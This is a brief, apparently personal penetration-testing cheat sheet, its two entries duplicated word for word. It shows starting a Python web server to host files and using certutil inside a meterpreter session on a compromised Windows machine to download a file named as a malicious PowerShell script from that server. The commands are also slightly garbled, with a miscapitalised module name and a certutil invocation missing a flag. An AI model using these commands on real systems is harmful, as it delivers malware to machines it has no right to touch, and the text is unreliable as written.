Creating Python Webserver
useful to quickly create to serve files
python -m SimpleHttpServer $PORT
Download file from meterpreter in Windows session:
certutil -f http://$PYTHON_SERVER:80/$MALICIOUS_FILE.ps1 mal_file.ps1
useful to quickly create to serve files
python -m SimpleHttpServer $PORT
Download file from meterpreter in Windows session:
certutil -f http://$PYTHON_SERVER:80/$MALICIOUS_FILE.ps1 mal_file.ps1